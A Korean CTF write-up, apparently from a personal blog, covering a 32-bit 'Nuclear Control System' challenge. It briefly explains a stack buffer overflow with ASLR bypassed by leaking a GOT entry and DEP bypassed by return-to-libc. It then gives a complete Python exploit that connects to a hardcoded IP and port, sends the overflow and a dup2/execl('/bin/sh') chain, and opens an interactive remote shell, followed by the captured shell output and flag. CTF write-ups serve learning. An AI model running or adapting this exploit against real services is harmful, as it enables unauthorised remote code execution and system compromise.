본문
흠..일단 PASSCODE라는 놈이 있는데...이건 buf를 overwirte해서 \x00를 없앤 후 프린트되는 값을 얻어서 할 수 있을 것 같다.
IF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE
COUNT DOWN : 99
SEND SHELL
ls
examples.desktop
key
nuclear
THIS_IS_NOT_KEY_JUST_PASSCODE
cat key
BUG_BOUNTIES_b3COM3_GrEAT
cat THI*
in the end, i was there.
기본적인 buffer overflow 이다. 단, ASLR + DEP.
fork를 사용하기 때문에 ASLR을 우회하기 위해서 메모리 정보를 읽어올 수만 있다면, 고정된 값으로 동작할 것이므로, 우회가 가능하다.
DEP는 RTL로 우회한다.
GOT에 쓰여진 값을 recv 함수를 통해 강제로 읽어와 해당 함수가 어디로 mapping 되어 있는지 확인하고,
이 값을 기준으로 execl, "/bin/sh", dup2 함수 위치를 계산한다.
그걸로 exploit을 하면 된다..........
target system은 ubunutu 13.10 32bit 이다.
#!/usr/bin/python import socket import telnetlib import binascii import time import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('58.229.183.22', 1129)) data = s.recv(1024) print "READ : ",data #print "SEND", buffer s.send("target"+ "\n") time.sleep(0.5) print s.recv(1024) print "----------------------------------------------" s.send("1111638656.000000/1111638656.000000"+ "\n") print s.recv(1024) ''' print "----------------------------------------------" s.send("A"*612+"\n") print s.recv(1024) print "----------------------------------------------" :: Welcome to the Nuclear Control System :: > ---------------------------------------------- [+] Enter coordinate of target, (Latitude/Longitude) ---> ---------------------------------------------- [+] Target coordinate setting completed. > ---------------------------------------------- [!] Unknown command : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA N Nin the end, i was there. ''' p = lambda x : struct.pack("<L" , x) s.send("launch\n") time.sleep(0.5) print s.recv(1024) print "----------------------------------------------" s.send("in the end, i was there."+"\n") print s.recv(1024) print "----------------------------------------------" print s.recv(1024) print "----------------------------------------------" print s.recv(1024) print s.recv(1024) print "SEND SHELL" # x64. ''' setsockopt = socket.ntohl(0xc08a6ab7) system_func = p(setsockopt+805392) execl_func = p(setsockopt-228912) binsh_str = p(setsockopt+0x6D60C) dup2_func = p(setsockopt-69808) poppopret = p(0x804917e) ''' # x32 setsockopt = socket.ntohl(0xc08a6ab7) execl_func = p(setsockopt-232576) binsh_str = p(setsockopt+0x760d8) dup2_func = p(setsockopt-75984) poppopret = p(0x804917e) #step1. """ s.send("A"*512 + "\x02\x00\x00\x00" + "BBBB"*3 + "\x00\x89\x04\x08" + "BBBB" + "\x04\x00\x00\x00" + "\x0c\xb0\x04\x08" + "\x04\x00\x00\x00"+"\x00\x00\x00\x00"*2 + "CCCC") time.sleep(0.5) for i in range(10) : print "-x-x-x-x-x-" d = s.recv(1024) print binascii.hexlify(d) print "--t-t-t-t-t-" print s.recv(1024) print s.recv(1024) #data = s.recv(1024) #print "READ : ",data """ #step2. s.send("A"*512 + "\x02\x00\x00\x00" + "BBBB"*3 + dup2_func + poppopret + "\x04\x00\x00\x00" + "\x00\x00\x00\x00" + dup2_func + poppopret + "\x04\x00\x00\x00" + "\x01\x00\x00\x00" + execl_func + "BBBB" + binsh_str +binsh_str + "\x00\x00\x00\x00"*4) t = telnetlib.Telnet() t.sock= s t.interact() t.close() s.close()
'WarGame' 카테고리의 다른 글
| [Codegate 2014 Junior CTF] Injection 1 . 300 Point. WEB (0) | 2014.02.12 |
|---|---|
| [Codegate 2014 Junior CTF] lottery 200 Point MISC (0) | 2014.02.12 |
| [wargame.kr] regex!? write up. 정규표현식!. (0) | 2014.01.23 |
| [wargame/suninatas] suninatas 워게임. (0) | 2014.01.08 |
| [overthewire/natas] web hacking wargame. (0) | 2014.01.06 |